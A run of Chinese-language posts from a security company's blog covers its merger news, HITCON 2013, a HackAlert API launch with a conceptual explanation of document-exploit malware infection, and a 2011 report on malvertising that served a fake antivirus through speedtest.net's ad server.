例如,對於廣告商來說,廣告給了機器人,等於廣告商白付了錢,所以廣告平台在這方面下了不少苦工。而對於APT攻擊者來說,惡意攻擊吐給了機器人(阿碼的爬蟲),等於自投羅網,暴露行蹤,所以APT的工具,在這方面也下功夫。由於兩者需求相同,2009年後,許多攻擊轉而利用網路廣告平台既有之功能,而形成一種新型、有效,難以偵測的威脅,我們稱為「惡意廣告攻擊」,在我們來看,也算是一種「次世代攻擊」。<br>
<br>
而對於阿碼來說,這是我們即將起飛的前夕,真可說是十年苦修,就待今朝!尤其過去兩年中,我們潛心打造我們阿碼新一代的檢測技術,重寫所有的系統,並開發了我們獨家的威脅描述語言與比對引擎Vicara。擁有了全新的雲端的平台與全新的檢測核心,現在再加上Proofpoint完整的Email安全解決方案,讓我們無比地興奮,如虎添翼的Proofpoint與阿碼科技,不但在Email APT產品方面將是全球最強,同時Proofpoint也將給阿碼科技更多資源,讓我們加速整個HackAlert Suite雲端產品線下面的每個產品 — 包含 HackAlert Website Monitoring網站掛馬檢測平台、HackAlert SafeImpression惡意廣告掃描平台、HackAlert Vulnerability Assessment弱點掃描平台、以及HackAlert CodeSecure源碼檢測平台!<br>
<br>
一方面,透過Proofpoint充足的資源與在雲端方面的經驗,我們HackAlert Suite產品線中的各個產品,將會能夠加速創新、進步與演進,另一方面,透過Proofpoint全球完整的業務與客服編制,我們將能夠幫助到全球更多、更廣的客戶,讓我們設計創新出來的諸多產品,能夠在全球更有影響力,讓更多企業能夠體會到我們產品的好處!<br>
<br>
各位,在全球資安界的舞台上,阿碼從一個台灣出來的小球員,一步一步地努力,今天終於要開始天天上大聯盟季後賽揮灑了。我們以無比興奮的心情,在這邊感謝各位,一路上交了許多朋友,也是受到了這麼多朋友一路上真心的幫忙,阿碼才能夠走到今天。謝謝各位一直以來對我們的支持,我們會永遠記得並珍惜!同時也請各位拭目以待,我們將推出全世界最頂尖的次世代攻擊防禦方案!<br>
<br>
黃耀文<br>
2013年8月8日<br>
<br>
<img border="0" src="http://1.bp.blogspot.com/-zrsdM23I3yQ/UemYv7Q9ztI/AAAAAAAAAJg/XUEriEwSkCY/s1600/HITCON_Armorize_Boys.jpg" /><br>
<img border="0" src="http://4.bp.blogspot.com/-CaAJS3d0ax8/UemW5MXTfYI/AAAAAAAAAJE/mv96L3PfHpM/s1600/HITCON_Armorize_Girls.jpg" /><br>
<center>阿碼科技部份同事於 <a href="http://hitcon.org/2013/">HITCON 2013</a></center>Unknownnoreply@blogger.com56tag:blogger.com,1999:blog-1441759431140700676.post-13258217650513792182013-07-20T03:46:00.002+08:002013-07-20T04:09:10.653+08:00賀 台灣駭客年會 #HITCON 2013 大成功!<br>這次台灣駭客年會第一階段售票時,我剛好在西雅圖出差。這次阿碼有四十位同事希望參加,怕買不到票,所以之前就請同事規劃好,先讀過相關資訊,把資料準備好,務必一開賣就趕快買。原本想一定沒有問題,沒想到出差時,同事跟我說,所有的票三分鐘內就賣光了,我們票買不夠,到等第二階段。什麼?有沒有聽錯啊?結果第二階段,也是三分鐘內賣光,還好我們買足了。<br>
<br>
在台灣辦資安研討會,辦到所有票都在三分鐘內被搶光,這是我之前從沒想過能發生的。我個人對於資安研討會的籌劃與執行,非常感興趣,除了有時去國外的研討會外,自己也在台灣辦過幾場會議。經歷過的朋友就知道,幾年前,要於台灣辦一場高品質的資安研討會,起初是多麼的困難!比起許多國家,台灣資安社群並不能說大,若單靠國內的支持,無論在與會人數或經費的取得上,都是很大的挑戰。向外考慮亞洲其他國家,也不容易:一方面旅費高,一方面則是亞洲各國語言不同。<br>
<br>
所以要辦一場成功的資安研討會,從講師的邀請,到內容的品質,到經費的募集,到場地的選擇,到方向與調性的定義,到語言問題的克服,到報名系統,到帳務與發票,到報到的通知,颱風的備案... 有太多的細節,需要工作人員日以繼夜的努力,有太多的挑戰,牽涉的是大環境的限制,需要的是工作人員達成不可能任務的心。這其間的艱難與犧牲,只有參與過的工作人員,才能夠體會。<br>
<br>
到今年,台灣駭客年會能夠辦一場講師來自世界各地,一共三個 track 同時進行的資安研討會,這是五年前,幾乎無法想像的!今天,一方面珍惜我們買到的四十張票,一方面也是被搶票的熱烈嚇到,阿碼的同事一大早就來排隊了。進了會場,參加完一整天的會議後,我們的感覺是:只要堅持理想,天下無難事!整個會議的進行,若不是聽眾都是黑頭髮,有時還真覺得,是在國外參加研討會。今年這里程碑,代表的不只是 <a href="http://hitcon.org/">HITCON</a> 的發展,也代表了台灣資安社群的成長。在這邊,我們用興奮的心情,恭喜 台灣駭客年會 <a href="http://hitcon.org/2013/">HITCON 2013</a> 大成功,也謝謝工作人員的付出!<br>
<br>
以下我們放一些我們團體於 <a href="http://hitcon.org/2013/">HITCON 2013</a> 的照片,為我們阿碼此次的參與 <a href="http://hitcon.org/2013/">HITCON 2013</a>,留下大家共同的回憶。大家辛苦啦!<br>
(<a href="http://hitcon.org/2013/">HITCON 2013</a> 的照片,要等他們公布了,演講廳內除工作人員外,不能夠拍照)
<br>
<img border="0" src="http://4.bp.blogspot.com/-ctwUGkyk8sE/UemW5CVPKBI/AAAAAAAAAJA/c1lcGMM7u-g/s1600/HITCON_Armorize_line.jpg" /><br>
<img border="0" src="http://1.bp.blogspot.com/-zrsdM23I3yQ/UemYv7Q9ztI/AAAAAAAAAJg/XUEriEwSkCY/s1600/HITCON_Armorize_Boys.jpg" /><br>
<img border="0" src="http://4.bp.blogspot.com/-CaAJS3d0ax8/UemW5MXTfYI/AAAAAAAAAJE/mv96L3PfHpM/s1600/HITCON_Armorize_Girls.jpg" /><br>
<span class="fullpost">
</span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-1441759431140700676.post-28603440121414631172013-04-08T20:41:00.000+08:002013-04-10T11:45:08.389+08:004月26日,讓我們一起發動...一場改變資安規則的創新革命!<div dir="ltr" style="text-align: left;" trbidi="on">
<img border="0" src="http://1.bp.blogspot.com/-R2mUUsTCHqI/UWK7_iY4AQI/AAAAAAAAAAs/HV1IRaF5bOc/s1600/secutech_2007_invite_banner_2.jpg" />
各位朋友,使用者,讀者,長官,合作夥伴,我們想邀請各位,於4月26日世貿資安展,與我們一起發動 一場改變資安規則的創新革命!<br>
<br>
您是否厭倦了身為一個台灣資安人所面臨的無奈?<br>
您是否看膩了每年資安廠商的行銷簡報?<br>
您是否質疑「針對性攻擊(APT)」,是否真有其威脅性?<br>
您是否懷疑,當初走上資安這條路的選擇?<br>
您是否在為個資法的實施煩心?<br>
您是否想知道,駭客最新的手法究竟有哪些?<br>
您是否好奇,阿碼最近到底在做些什麼?阿碼背後用的技術,又都是什麼?<br>
您是否想與阿碼背後的工程團隊見面?<br>
您是否想問,為何阿碼瞬間多了35位道德駭客(CEH)?<br>
<br>
經過實驗室的四年與公司成立的七年,我們將於4月26日世貿資安展,公開一場阿碼有史以來最重要的一次演講。對我們來說,在過去的十年中,再也沒有比這場演講,更重要的演講、paper、或部落格文章了。<br>
<br>
以往,我們的演講,大部分都是我一人的獨腳戲;這次,我邀了另外八位同事,與各位分享他們的工作與展望。<br>
以往,我們很少談我們背後用的技術;這次,我們將一一提及。<br>
以往,我們不常分享我們成功的原因;這次,我們將很確實地分享,那些帶給我們成功的關鍵。<br>
<br>
也因為如此,我們這場跟其他場次的進行方式不一樣。經過與主辦單位協調,我們這場將由原本標準的40分鐘,延長為70分鐘,為全場最長的演講。<br>
<br>
<a href="http://1.bp.blogspot.com/-5_HT01vfT7w/UWK536cWPxI/AAAAAAAAAAc/if-sqc_E03k/s1600/privacy_book2.jpg" imageanchor="1" ><img align="right" border="0" src="http://1.bp.blogspot.com/-5_HT01vfT7w/UWK536cWPxI/AAAAAAAAAAc/if-sqc_E03k/s320/privacy_book2.jpg" /></a>
我們保證,這將是阿碼有史以來最不一樣的一場演講!同時,我們也將在演講結束時,發送給各位由 資策會科技法律研究所 著,由研考會 戴副主委豪君、法務部法律事務司 陳司長維練、資策會 張董事長進福、資策會科技法律研究所 何所長寶中 先生們所共同推薦,於今年一月剛熱騰騰出版之:<a href="http://www.books.com.tw/exep/prod/booksfile.php?item=0010570465">「個資保護 1.0」</a>一書。我們買了170本,大概是現場位子的數量,將先發予座位上的朋友,發完為止!<br>
<br>
我們這一場「革命演講」的參加資訊為:<br>
<br>
<b>題目:解密最深威脅:APT 鑑識新境界與阿碼願景</b><br>
<b>地點:第12屆亞太資訊安全論壇暨台北國際資訊安全科技展,南港展覽館 5F 504a (<a href="http://aranya.info/secutech13/floormap1.png">地圖請見此</a>)</b></br>
<b>時間:4/26日(五)11:50am~1:00pm,IS1103場,5F 504a</b></br>
<b>報名:<a href="http://www.secutechinfosecurity.com/13/tw/seminar_register.aspx?ff=5&rr=14">http://www.secutechinfosecurity.com/13/tw/seminar_register.aspx?ff=5&rr=14</a></b><br>
<span class="fullpost">
<br>
我們的另一場演講,將是一場全台語的演講,主要介紹我們針對 Email 與 APT 方面的解決方案:<a href="http://www.proofpoint.com/products/targeted-attack-protection/index.php">ProofPoint Target Attack Protection</a>,將由 ProofPoint 原廠講師 Kenneth Liao 與阿碼科技總經理 徐明達 、創辦人 黃耀文同台。<br><a href="http://www.proofpoint.com">ProofPoint</a>是全球 Email 安全之龍頭品牌,我們自去年起與 ProofPoint 合作,建立了獨步全球的 Email APT 解決方案,並很期待與各位分享我們的成果!<br>
<br>
Kenneth Liao目前於美國矽谷帶領 ProofPoint 之業務工程團隊,此次將特地飛來台灣,與我們一起跟各位介紹我們這獨步全球的 Email APT 解決方案。Kenneth Liao父母皆為台灣人,但是因為於美國出生長大,國語不流利,故在英文與台語二選一下,我們選擇了台語。這應該是亞太資安展有史以來第一次的全台語演講,也絕對會是一場您沒有聽過的演講。這場是標準的 40 分鐘,沒有送書。<br>
<br>
<b>題目:完整企業Email安全配套: 「APT」、「個資」、「洩密」完封全防線</b><br>
<b>地點:第12屆亞太資訊安全論壇暨台北國際資訊安全科技展,南港展覽館 5F 504b</b></br>
<b>時間:4/25日(四)11:50am~12:30pm,IS803場,5F 504b</b></br>
<b>報名:<a href="http://www.secutechinfosecurity.com/13/tw/seminar_register.aspx?ff=5&rr=15">http://www.secutechinfosecurity.com/13/tw/seminar_register.aspx?ff=5&rr=15</a></b><br>
<br>
深入、創新,是阿碼的核心精神。我們秉持著深入、創新的精神,這兩年在各方面都獲得了佳績。我們很期待,也很興奮,希望能夠把我們在前線看到的,體驗到的,學到的,領悟到的,與各位分享。尤其是4/26日(五)的「革命演講」,絕對是阿碼有史以來最不一樣的演講!<br>
4月26日世貿資安展,讓我們一起發動一場 改變資安規則的創新革命!<br>
<br>
阿碼科技 創辦人<br>
黃耀文 敬上<br>
<br>
</span></div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1441759431140700676.post-86150309786729682692013-03-04T22:00:00.000+08:002013-04-08T20:48:57.196+08:00阿碼科技於 RSA 推出 APT 偵測與鑑識 API<div dir="ltr" style="text-align: left;" trbidi="on">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNxkr7qBji2c7yV4ncdaiPHXtmXG-SjEa_4sfWZ_H23tjI8mXNzZY6m6ZHIg235n3CIy4MzmPJdLu1JEyI0tuqAFPAYrdI00oc0YyHtT_PlnnRhsDrRWkAlLMwQHZxCiMm_juAg76Jo2Q/s1600/Screen+Splash_APT2_72dpi.png" />
<br />
各位好,久違了!我們團隊剛完成了今年於舊金山的 RSA Conference 展覽;回首過去,我們已經連續七年參展了!我們想藉此機會,在這邊向各位報告阿碼最近努力的方向。我們已經16個月沒有寫部落格了。我們太忙了:許多新的客戶要支援,許多新的威脅要研究,許多新的技術要開發...這種種,使得花時間寫部落格一事,成了一種不具合理性的奢侈。距離我們再次寫部落格,可能還要好幾個月的時間,但是我們想要先在此做個簡短的報告。<br />
<br />
過去16個月當中,我們致力於以下方面:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnG8IB5aTQxSlMVg0VNiKy6gStCPiIpPiyeHw_HZKAke53YZz2nbKyoh_IrdaXo4Q-TVlNgg1j1H9m0u1dShXRSRwNGeDbaB9rhmv7XGWS3u2Sc2rCXma5gd1i4RsieaNXTBG5jT1N_ko/s1600/IMG_4811_cropped.JPG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnG8IB5aTQxSlMVg0VNiKy6gStCPiIpPiyeHw_HZKAke53YZz2nbKyoh_IrdaXo4Q-TVlNgg1j1H9m0u1dShXRSRwNGeDbaB9rhmv7XGWS3u2Sc2rCXma5gd1i4RsieaNXTBG5jT1N_ko/s1600/IMG_4811_cropped.JPG" /></a>
<br />
<ol style="text-align: left;">
<li>擴大我們的技術團隊,並且透過課程與考試來刺激並提升團隊的技術。</li>
<li>完成並推出 <a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a>,並研發 V6 API;V6 API 將於今年 Q3 推出。</li>
<li>在 <a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a> 中加入針對性攻擊(API)的偵測,可偵測的範圍包含各種文件檔案(PDF、Word、Excel、Powerpoint、Access、Project、Exe、網頁、廣告),並產生AFRM- (Armorize Fornsics and Reporting Methodology) 格式的鑑識報告。</li>
<li>與全球最大之電子郵件安全廠商合作,推出具有多重安全掃瞄之電子郵件服務,其中特別對於針對性攻擊(APT)之防禦以及個資法等需求做設計。</li>
<li>研發並完成 CodeSecure V5,並開始 CodeSecure V6 之研發。</li>
</ol>
<b>關於 1) 擴大我們的技術團隊</b><br />
<br />
在這邊我們恭喜在過去六個月內,通過 EC-Council Certified Ethical Hacker (CEH) 「道德駭客認證」的35位同事:Adam Wei (ECC974360),Ain Chang (ECC974345),Alex Ruan (ECC974342),Allan Ku (ECC971799),Angus Wei (ECC974359),Aryan Chen (ECC974344),Carol Ru (ECC974341),Cyndi Wei (ECC974340),Eddie Chou (ECC974362),Eric Liu (ECC971746),Fred Tai (ECC971717),Hsuan Wang (ECC974346),Hyman Pan (ECC971733),Jasmine Chen (ECC974343),Jason Yang (ECC971702),Jeff Lee (ECC971815),Jimmy Huang (ECC974354),Joe Chang (ECC974361),Jordan Forssman,Lance Chang (ECC971730),In-Yee Lee (ECC971736),Mars Fu (ECC971756),Martin Chen (ECC971707),Matt Huang (ECC974356),Max Hsu (ECC974353),Michelle Juan (ECC974363),Paul Chen (ECC974358),Robin Huang (ECC971724),Roger Wang (ECC971813),Susan Chiu (ECC974347),Tom Kao (ECC971805),Van Cheng (ECC974357),Wayne Huang (ECC971814),以及Wilson Chiou (ECC971812)。恭喜他們!<br />
<br />
對於我們來說,持續的學習與在職訓練,是保持頂尖技術的關鍵。我們會持續在這方面加強。<br />
<b><br /></b>
<b>關於 2) HackAlert V5 API 的推出</b><br />
<br />
我們於 2009 年推出 HackAlert V3 API,至今,V3 API 已經非常成熟且穩定了。基於 V3 API 的經驗,並導入新的雲端與大量資料技術,我們發產出了三代的 HackAlert API。其中,我們使用了:
<span class="fullpost">
<br />
<ol style="text-align: left;">
<li>Non-relational, elastic storage</li>
<li>Map reduce</li>
<li>Big data technologies</li>
<li>Message queues</li>
<li>Elastic load balancers</li>
<li>Virtualization and dynamic provisioning</li>
<li>Distributed shared memory</li>
<li>Distributed caching</li>
</ol>
我們於2010年推出了 HackAlert V4 API,主要針對惡意廣告的掃瞄。上星期,於 RSA 2013 年會上,我們推出了 <a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a>,主要針對電子郵件與針對性攻擊(APT)的掃瞄,以及提供 AFRM 格式的鑑識報告。<br />
<br />
<a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a> 的設計,主要也針對巨量的掃瞄做改進,有足夠的scalability以及穩定性,足以承受如 Google 般的巨量掃瞄。<br />
<br />
針對以上提到的惡意廣告之檢測以及電子郵件內容之檢測,阿碼都很幸運地旗開得勝,兩個應用第一個簽約的客戶,都是該領域全球最大的廠商!<br />
<br />
HackAlert V3 以及 V4,也因此到達了產品生命週期的尾聲。自2012年11月開始,新的客戶已經不能取得 V3 或 V4,我們也正協助所有既有客戶移植到 <a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a> 上面。<br />
<br />
HackAlert V6 API 則重新寫了所有既有的元件,包含底層的偵測元件,都是全部從零開始重寫的。HackAlert V6 API 預計今天 3Q 上市,服務所有的客戶。
<br /><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaiBNzBtPCynMIAJoM7nJg2Ch64pPpsMVVMQChybimetezdHBTbB92adCKzkTDh24bHcmglByP_a6au2pusuQy0wjKZXVS02lIU7Zmqo2fNQMAtIAmif0EMUadsp5AGZZOSfwMLlpDJE4/s1600/UI%E5%A4%9A%E8%9E%A2%E5%B9%95750px.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaiBNzBtPCynMIAJoM7nJg2Ch64pPpsMVVMQChybimetezdHBTbB92adCKzkTDh24bHcmglByP_a6au2pusuQy0wjKZXVS02lIU7Zmqo2fNQMAtIAmif0EMUadsp5AGZZOSfwMLlpDJE4/s1600/UI%E5%A4%9A%E8%9E%A2%E5%B9%95750px.png" /></a>
<br /><br />
<b>關於 4) 與電子郵件安全龍頭合作</b><br />
<br />
承上述,<a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" style="font-family: 'times new roman', serif; white-space: pre-wrap;" target="_blank">HackAlert V5 API</a> 一推出,就吸引了業界電子郵件安全之龍頭廠商使用,也將阿碼的技術,帶入了一個新的領域。與此龍頭廠商合作,我們體會到,除了 APT 的偵測之外,email 安全的整體 solution 應包含:<br />
<ol style="text-align: left;">
<li style="white-space: pre-wrap;">DLP:Email 的內容以及附件,應該深入搜尋分析,找出任何含有個資與機密的文件,配合公司 制訂之規則 (policy) 加以控管。規則要有好的 UI 來定義與整理。
</li>
<li>通報的方式要具有彈性:由於當外送的 email 違反了公司的規定時,通報過程敏感,故不應該所有事件都統一通報 IT 主管。例如 當 HR 部門外送了一份含有個人資料的履歷,那麼該通知誰?抑或 RD 部門,外送了一份還有機密資料的文件,則又應該通知誰?哪些行為,直接退回郵件,哪些是經過審查可以放行,哪些則是需要通報違規?若高階主管寄給下屬的信中,具有不雅字眼,或騷擾性字眼,則又該通知誰?
</li>
<li>規則要可以訂得深入。例如 APT 攻擊中的 PDF 檔案,若存在於有密碼之壓縮檔中,則可能不容易解開來掃瞄。那麼,公司是否允接收許有密碼的壓縮檔?外送的檔案呢?
</li>
<li>透過 email 的附檔,可以了解公司內部,所擁有的檔案到底有多少,並追蹤版本。如果聯合網路磁碟機(SMB)與 Sharepoint 的外掛等,怎可以逐漸把公司內部所有檔案加以追蹤並保存,以及統計,哪些檔案的哪些版本,被分享給哪些人了?在個資法開始後的今天,這些功能格外重要。
</li>
<li>攻擊圖譜與報告。即使是針對性攻擊,也可能有多個目標。針對某攻擊事件,可以清楚地表示出,有誰收到攻擊了?有誰開了檔?有誰按了連結?惡意程式做什麼事情?連回哪裡去?這些資訊要能盡量自動產生,才能在第一時間,對 IT 人員產生幫助。</li>
</ol>
基於以上,我們與該電子郵件龍頭相互合作,對方全球客戶,統一由阿碼科技 HackAlert V5 API 負責掃瞄 URL與附檔的安全性,而我們則取得對於於亞洲之銷售權,得以提供對方之解決方案與我們亞洲之客戶使用。此相互授權,讓我們的客戶能夠獲得最高品質的技術與服務:在 APT 針對性攻擊方面,有阿碼獨步全球的掃瞄引擎,在其他電子郵件安全方面,則有全球最先進,最完整的平台,並由阿碼科技就近提供服務。<br />
<b><br /></b>
<b>關於 3) 針對性攻擊(API)的偵測與 AFRM 鑑識報告</b>
<br /><br />
這一段,太多專有名詞了,似乎用中文不容易翻譯,我們先保留原文。這段的重點是,我們發明了 AFRM 鑑識報告,讓使用者可以很簡單明瞭地透過我們的鑑識報告,來了解一個攻擊中間發生的所有事情,以及所有行為的來龍去脈。<br />
<br />
AFRM-based reporting is an important new feature of the <a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a>. For every scan you submit to the HackAlert service (ex: online ad, URL, malware, document exploit), you will get a detailed, aggregated forensics report, laid out according to the Armorize Forensics Reporting Methodology (AFRM). AFRM enables you to easily comprehend the returned forensics data, and to use it for your own further analysis. AFRM reports include:<br />
<ol>
<li>Scene details (eg., URL, ad tag, PDF document).</li>
<li>Aggregated interpretations (eg., “malicious”, “blacklisted”).</li>
<li>Aggregated proofs (eg., “drive-by download”, “registry modification”, “process injection”). Proofs provide support for interpretations.</li>
<li>Aggregated exhibits (eg., code snippet of shellcode, code snippet of exploit code, code snippet of HTTP responses, parameters of API calls, sections of binary files). Exhibits are sections of evidences that provide support for proofs.</li>
<li>Aggregated evidences (eg., HTTP response, API calls, binary files).</li>
<li>Evidence correlations (eg., Javascript 1 (Exhibit A) --> document.write (Exhibit B) --> Javascript 2 (Exhibit C) --> Load iframe 3 (Exhibit D)).</li></ol>
You will know exactly what a target is made up of, what it tries to do, where the attack is coming from, and the causality relationships between the collected evidences.<br />
<br />
<b>Exploit-Based Malware Infections</b><br />
<br />
To explain AFRM, we first take a look at the exploit-based malware infection (EBMI) process, which is a widely used attack vector in Advanced Persistent Threats (APT). In EBMI, the victim is infected via opening a malicious document, often referred to as a document exploit. Common document exploit formats used in EBMI include Web pages, PDF files, Word files, Powerpoint files, Excel files, and Flash files embedded inside one of the previous types.<br />
<br />
<b>Phase 1: Exploit delivery and shellcode execution</b><br />
<br />
During EBMI phase 1, the victim opens a document via a (document) renderer–defined as a software program that displays the document. Common (document, renderer) pairs include: (Web page, Web browser), (Web page containing flash, Web browser with flash support or plug-in), (Web page containing Java applets, Web browser with applet support / JRE), (PDF document, PDF reader), (Word document, MS Word), (Excel document, MS Excel), (Powerpoint document, MS Powerpoint), etc.<br />
<br />
The document here, being malicious, is referred to as a document exploit. It contains mechanisms to exploit vulnerabilities either directly inside the renderer itself, or inside one of the renderer’s installed plug-ins (eg., Flash, Java applet, Real player, etc). If the exploited vulnerability is unknown to the renderer provider (vendor), then it is called a 0-day exploit.<br />
<br />
This exploitation code (the exploit) is often implemented using scripting languages (eg., Javascript, Actionscript, VBScript, VBA) Two key factors make scripting languages extremely useful for this purpose: a) they provide the functionality needed to exploit the targeted vulnerability and b) being interpreted languages, it is very easy to obfuscate the exploitation code, thus making detection difficult.<br />
<br />
Common (renderer, scripting language) pairs include (Web browsers, Javascript), (Flash, Actionscript), (PDF, JScript), (Office documents, VBA macros). Note that Javascript, Actionscript, and JScript are all ECMA-based scripting languages.<br />
<br />
The following attacks leverage an EBMI process: a) drive-by download attacks, b) malvertising attacks, c) URL-based email attacks, and d) attachment-based email attacks. In (a) (b) and (c), the browser ultimately loads a Web page served by an exploit pack, which serves polymorphic Web-page exploits. The server that hosts the exploit pack is called the exploit server, and the involved URLs are called the exploit URLs.<br />
<br />
<b>Phase 2: Malware execution</b><br />
<br />
When a document exploit is opened and upon successful exploitation, a dropper is often created on disk and executed. The dropper can either be the actual malware, or it can be just a tiny executable whose sole job is to download the actual malware over Internet.<br />
<br />
In order to permanently infect the compromised system, the malware will often a) move itself to permanent disk locations and b) modify system configuration (eg., registry settings) so as to be auto executed upon every system startup. In order to hide itself from security checkers and users, the malware will often a) rename itself to seemingly legitimate filenames or b) arrange for alternative, less detectable and higher-privileged methods of execution, for example, using process injection.<br />
<br />
Once permanently installed, the malware will typically start to a) connect back home to the command-and-control (CNC) server, or to b) send the collected information back to the attacker.<br />
<br />
Using the <a href="http://www.armorize.com/resources/apt/apt-malware-malvertising-scanning-api.pdf" target="_blank">HackAlert V5 API</a>, you will not only be able to detect EBMI, but also receive detailed forensics reports on exactly what had happened during the two EBMI phases.<br />
<br />
<b>關於 5) </b><b style="font-family: 'times new roman', serif; white-space: pre-wrap;">CodeSecure V5 的推出</b><br />
<b style="font-family: 'times new roman', serif; white-space: pre-wrap;"><br /></b>
CodeSecure V4 是我們第一次推出純軟體式的 CodeSecure。相較於 CodeSecure V3,CodeSecure V4 更具彈性與可攜性。然而,我們就像是從通盤掌握軟硬體的 Apple,變成了只掌握軟體 Android 的 Google 一樣,在陌生不受我們控制的平台上執行 CodeSecure V4,多少遇到一些前所未有的困難。<br />
<br />CodeSecure V5 改善了不少這方面的問題,同時也在速度以及涵蓋性上面有了大幅的突破。去年,我成功地說服了我六位交大的同學與室友,放棄了他們很好的工作,來加入阿碼的行列。其中之一是 Martin Chen,我跟他從大學時之前籌備蛋糕社,佛學營,一直到現在,長期配合起來非常有默契。他是新的 CodeSecure 掌舵者,並另外寫了他自己的一篇部落格。我將這令人興奮的 CodeSecure V5 上市,留給他介紹。<br />
<br />
</span>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-62305620711710249632011-10-14T01:17:00.000+08:002011-10-14T01:17:39.384+08:00speedtest.net 廣告平臺(OpenX)遭受攻擊,散佈偽冒的防毒軟體"Security Sphere 2012"(作者: Wayne Huang, Chris Hsiao, NightCola Lin)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG-DzHH2CVX61JU9x6M812yDTVzRlWekCQEEZ3P6QU4zIA7uqoSnVdm7ECN0loCflEsFYL2ZhekbORe1ZfXBgYQ6B1N4njovfXANyjCX-VXW2FLNYQ9lPR9nZSjnNH757Y3U8xUXSGk_Y/s1600/malvertising+speedtest+net+security+sphere+2012+fake+antivirus+1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG-DzHH2CVX61JU9x6M812yDTVzRlWekCQEEZ3P6QU4zIA7uqoSnVdm7ECN0loCflEsFYL2ZhekbORe1ZfXBgYQ6B1N4njovfXANyjCX-VXW2FLNYQ9lPR9nZSjnNH757Y3U8xUXSGk_Y/s1600/malvertising+speedtest+net+security+sphere+2012+fake+antivirus+1.png" /></a></div><br />
<b>事件說明:</b> SpeedTest.net,<a href="http://www.alexa.com/siteinfo/speedtest.net">Alexa排名第541</a>,每個月的流量為 <a href="http://www.checksitetraffic.com/traffic_spy/speedtest.net">8,141,777 個瀏覽者(unique)及 10,177,221 次的網頁瀏覽</a>,成為惡意廣告的受害者,進而對瀏覽者散播"Security Sphere 2012"這隻偽防毒軟體。僅僅是瀏覽此網站,只要瀏覽者的瀏覽環境沒有更新到最新(包括瀏覽器本身及其插件: Java,PDF,Flash,etc),在瀏覽過後,就會被安裝上"Security Sphere"這個惡意程式。<br />
<br />
<b>惡意程式:</b> 此程式會鎖住所有電腦上大部份的應用程式,嘗試去執行時,右下角會彈出訊息:"Application cannot be executed. The file xxxxx.exe is infected...",不允許執行。直到你為了"清除病毒"而付費去購買"序號"。<br />
<br />
<b>緣由:</b> SpeedTest.net 使用自己架設的OpenX線上廣告平臺,使用的網域為ads.ookla.com。攻擊者成功的入侵此平臺並再每個廣告中注入惡意iframe。以下影片錄下瀏覽者整個被感染的過程:<br />
<iframe height="468" width="750" src="http://www.youtube.com/embed/fVcZ8ZeVaZo" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>惡意程式生命週期:</b> 一開始在VirusTotal上的偵測率為 <a href="http://www.virustotal.com/file-scan/report.html?id=969bad4d52672e8b6475e88d266337906022c47966daba0c5dfedc1321885470-1318192617">0 /43</a>:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcXY5AtoxJhyjrTCJSfQO140yYrIycu8hJ9lPPzDWCXZUaDPXq8Bo64b-Bsr8pORIiG-oOKlJbrrqVcg9SACrt0Kgwa2G1wAiPiHKUSI9oEel0hbB3U8OsGemwL2CBcipCHA53Rtp7H-8/s1600/Malvertising+on+speedtest+net+Security+Sphere+2012+fake+antivirus+3.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcXY5AtoxJhyjrTCJSfQO140yYrIycu8hJ9lPPzDWCXZUaDPXq8Bo64b-Bsr8pORIiG-oOKlJbrrqVcg9SACrt0Kgwa2G1wAiPiHKUSI9oEel0hbB3U8OsGemwL2CBcipCHA53Rtp7H-8/s1600/Malvertising+on+speedtest+net+Security+Sphere+2012+fake+antivirus+3.png" /></a></div><br />
<b>此惡意程式會偵測常見的虛擬環境(Virtual machines),不會在沙盒或虛擬環境之中執行。這個方法能夠有效的規避偵測率。</b><br />
<br />
以下為此惡意程式的生命週期。這隻程式並沒有在一開始被發現的時候就傳送過去,所以此週期並不是100%的準確,但它提供了一個很好的參考:<br />
<br />
<b>2011-09-XX 00:00 UTC</b> SpeedTest.net及其他網站開始遭受感染<br />
|<br />
|<br />
(防毒軟體廠商尚未取得此惡意軟體樣本,因此沒有任何一家能夠偵測到)<br />
|<br />
(我們不確定這個狀況持續了多久)<br />
|<br />
|<br />
<b>2011-09-30 09:23 UTC</b> 0 / 43,我們一開始傳送樣本到VirusTotal時。 因為所有43家廠商都跟VirusTotal有合作關係,因此當我們上傳過去後,他們便可以取得樣本。<br />
<br />
<b>2011-09-30 11:00 UTC</b> 2 / 43, Kaspersky, NOD32<br />
<br />
<b>2011-09-30 15:00 UTC</b> 3 / 43, Dr. Web<br />
<br />
<b>2011-09-30 19:00 UTC</b> 7 / 43, Comodo, Emsissoft, Microsoft, Panda<br />
<br />
<b>2011-09-30 23:00 UTC</b> 9 / 43, AVG, Symantec<br />
<br />
